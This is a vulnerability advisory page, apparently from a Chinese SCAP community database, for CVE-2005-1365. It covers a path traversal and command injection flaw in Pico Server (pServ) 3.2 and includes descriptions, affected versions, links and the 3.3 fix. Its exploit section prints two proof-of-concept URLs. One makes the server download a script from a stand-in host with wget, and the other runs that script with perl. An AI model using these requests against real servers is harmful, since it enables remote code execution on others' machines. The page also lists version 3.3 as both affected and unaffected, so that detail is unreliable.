CVE-2005-1365
CVSS10.0
发布时间 :2005-05-16 00:00:00
修订时间 :2016-10-17 23:19:19
NMCOS    

[原文]Pico Server (pServ) 3.2 and earlier allows remote attackers to execute arbitrary commands via a URL with multiple leading "/" (slash) characters and ".." sequences.


[CNNVD]Pico Server远程命令注入漏洞(CNNVD-200505-1049)

        Pico Server是一款小型的Web服务器。
        Pico Server对用户请求的路径字串处理上存在漏洞,远程攻击者可能利用此漏洞在主机上执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:pico_server:pico_server:3.0_beta_3
cpe:/a:pico_server:pico_server:3.2
cpe:/a:pico_server:pico_server:3.1
cpe:/a:pico_server:pico_server:3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1365
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1365
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1049
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=full-disclosure&m=111625635716712&w=2
(UNKNOWN)  FULLDISC  20050516 Advisory: Pico Server (pServ) Remote Command Injection
http://sourceforge.net/project/shownotes.php?release_id=327708
(UNKNOWN)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=327708
http://www.redteam-pentesting.de/advisories/rt-sa-2005-010.txt
(VENDOR_ADVISORY)  MISC  http://www.redteam-pentesting.de/advisories/rt-sa-2005-010.txt
http://www.securityfocus.com/bid/13642
(UNKNOWN)  BID  13642

- 漏洞信息

Pico Server远程命令注入漏洞
危急 设计错误
2005-05-16 00:00:00 2006-05-12 00:00:00
远程  
        Pico Server是一款小型的Web服务器。
        Pico Server对用户请求的路径字串处理上存在漏洞,远程攻击者可能利用此漏洞在主机上执行任意命令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载3.3版本:
        http://pserv.sourceforge.net/

- 漏洞信息

16630
Pico Server (pServ) Traversal Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

pServ contains a flaw that allows a remote attacker to execute arbitrary commands outside of the web path. The issue is due to the server not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the URI.

- 时间线

2005-05-16 2005-04-29
2005-05-16 Unknow

- 解决方案

Upgrade to version 3.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Pserv Directory Traversal Vulnerability
Design Error 13642
Yes No
2005-05-16 12:00:00 2009-07-12 02:56:00
Discovered by Claus R. F. Overbeck <bugtraq@clausrfoverbeck.de>.

- 受影响的程序版本

Pserv Pserv 3.2
Pserv Pserv 3.3

- 不受影响的程序版本

Pserv Pserv 3.3

- 漏洞讨论

pServ is prone to a directory traversal vulnerability. This occurs because the application does not implement a proper method for filtering directory traversal sequences from URIs. Since this can be done from the cgi-bin directory, it is possible to execute commands to which the Web server has permission.

This issue was reported to affect pServ version 3.2; earlier versions are like vulnerable.

- 漏洞利用

An exploit is not required. The following proof of concept demonstration was supplied:

The following url downloads a script (or executable) to the server:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl

This is how the script can be executed afterwards:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl

- 解决方案

This issue was addressed in pServ 3.3:


Pserv Pserv 3.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站